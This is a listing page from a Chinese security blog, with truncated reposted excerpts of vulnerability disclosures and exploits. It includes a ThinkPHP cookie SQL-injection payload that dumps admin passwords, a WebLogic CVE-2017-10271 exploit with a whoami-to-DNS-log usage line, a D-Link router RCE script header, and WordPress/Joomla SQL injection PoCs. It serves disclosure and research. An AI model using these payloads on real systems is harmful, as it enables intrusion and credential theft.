-
[转]第二届“强网杯”全国网络安全挑战赛web部分writeup
![[转]第二届“强网杯”全国网络安全挑战赛web部分writeup](https://www.hedysx.com/wp-content/themes/hicms/images/random/tb3.jpg "[转]第二届“强网杯”全国网络安全挑战赛web部分writeup")
本文章转子互联网。 赛事介绍 为全面贯彻习主席关于网络安全和信息化工作的一系列重要指示精神,延揽储备锻炼网信领域优秀人才,提升国家网络空间安全能力水平,举办第二届“强网杯”全国网络安全挑战赛。该比赛是面向高等院校和国内信息安全企业的一次国家级网络安全赛事,旨在通过激烈的网络竞赛对抗,培养和提高国家网络安全保障能力和水平,发现网络安全领域优秀人才,提...抢沙发
-
thinkphp3.2.3注入漏洞
这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 mem...作者:hedysx| 发布:2018年3月05日 | 分类:漏洞公布 | 阅读:1,964次| 标签:thinkphp漏洞
-
Dedecms任意用户登录
##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE;...
-
Weblogic(CVE-2017-10271)漏洞Exp
文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) ...
-
D-Link DIR8xx 远程代码执行漏洞
脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
-
Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
# # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: Wi...
-
phpBB 3.2.0 Server Side Request Forgery
title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
-
WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection
# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST[‘CatID’] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...作者:hedysx| 发布:2017年6月28日 | 分类:漏洞公布 | 阅读:3,556次| 标签:wordpress漏洞
-
WordPress Huge-IT Video Gallery 2.0.4 SQL注入
Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...作者:hedysx| 发布:2017年5月30日 | 分类:漏洞公布 | 阅读:2,998次| 标签:wordpress漏洞
-
WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...作者:hedysx| 发布:2017年4月26日 | 分类:漏洞公布 | 阅读:3,219次| 标签:wordpress漏洞
最新评论
cheap coach to great yarmouth:
six
password:
好详细、
Mxaol:
跪求跪求跪求邀请码一枚,发邮箱学
zedong:
跪求一枚邀请码,学习下,邮箱ti
cyl1053995738:
求个码!! 1053995738
tbcode:
求个邀请码 tbcode@qq.
20130112:
90给一个邀请码...11822
forget:
能否给一个邀请码...本人初学X
大耳朵:
我坚信 我能一刀见血的评论!!
yahoho:
跪求邀请码。。。 邮箱:34